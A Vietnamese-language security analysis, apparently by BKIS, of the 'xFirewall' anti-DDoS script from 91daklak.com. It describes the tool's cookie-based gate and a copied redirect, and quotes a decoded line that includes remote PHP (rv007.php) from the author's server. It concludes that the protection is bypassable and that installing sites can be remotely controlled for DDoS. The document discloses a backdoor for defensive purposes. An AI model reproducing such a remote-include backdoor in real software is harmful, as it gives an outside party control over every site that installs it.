Phân tích của BKIS về phương thức hoạt động xFirewall
1. Phương thức hoạt động của xFirewall:
- Khi người dùng truy cập vào một trang nào đó mà được “xFirewall bảo vệ” (danh sách trang “được bảo vệ” nằm trong file .htaccess) thì server sẽ kiểm tra cookie của trình duyệt trên máy người dùng.
- Nếu Cookie đã tồn tại, server sẽ thực hiện việc cho phép browser truy cập đến trang mà browser yêu cầu. Mọi việc diễn ra bình thường
- Nếu không tồn tại, server sẽ trả về trang index.html trong thư mục xFirewall. (Ví dụ: tại ngay trang www.91daklak.com trình duyệt sẽ trả về http://www.91daklak.com/xfirewall/index.html nếu người dùng truy cập lần đầu tiên)
- Tiếp tục đối với link: http://www.91daklak.com/xfirewall/index.html. Trang này sẽ gọi đến 1 file flash xFirewall.swf. Khi người dùng nhấn vào nút Enter trên flash này trình duyệt của người dùng sẽ truy cập đến file xfirewall.php (nội dung của fire php này đã được mã hóa). File php này sẽ được thực hiện trên Server và trả về cho trình duyệt của người dùng thực hiện mã lệnh như sau: (đoạn mã này được lấy từ việc truy cập đến trang http://www.91daklak.com/ )
Nhiệm vụ của đoạn mã trên có thể được mô tả ngắn gọn như sau: trình duyệt sẽ thiết lập 1 cookie đối với trang web trên và truy cập đến địa chỉ http://www.91daklak.com/diendan/?®|91daklak|™|xFirewall|
- Có 1 chi tiết khá đặc biệt là không hiểu sao trong hàm urlforward() tác giả lại để đoạn mã
(location.href = http://www.geocities.jp/songdongnet/)
mà phải là (location.href = "http://91daklak.com/") mới đúng.
Chi tiết trên có thể được giải thích khi xem đoạn mã trả về cho trình duyệt khi truy cập địa chỉ: http://www.geocities.jp/songdongnet/.
Khi so sánh kết quả với đoạn mã trên có thể khẳng định: Chúng là 2 bản copy của nhau.
- Một điều rất đáng chú ý nữa là khi giải mã ngược được 1 phần file xFirewall.php, do www.91daklak.com cung cấp, có 1 đoạn mã:
include 'http://www.91daklak.com/rv007.php';
Như vậy, cho dù xFirewall này cài đặt trên bất kỳ hệ thống nào khi người dùng đăng nhập cũng thực hiện file rv007.php trên địa chỉ: http://www.91daklak.com/ còn việc rv007.php làm những gì là tùy thuộc vào người cài đặt nó trên địa chỉ http://www.91daklak.com/
2. Kết luận:
- Khả năng chống DDOS thông qua SetCookie như trên gần như không có hiệu quả vì kẻ tấn công có thể gửi cho Server một Cookie có sẵn trước khi gửi hàng loạt các request tấn công DDOS. Như vậy chỉ cần thêm 1 vài bước, kẻ tấn công có thể “hóa giải” được xFirewall
- Hệ thống xFirewall này hoàn toàn có thể được “điều khiển từ xa” thông qua file: rv007.php được cài đặt trên http://www.91daklak.com/. Điều đó khẳng định những website cài đặt hệ thống xFirewall này có thể bị lợi dụng để làm bàn đạp cho các cuộc tấn công DDOS.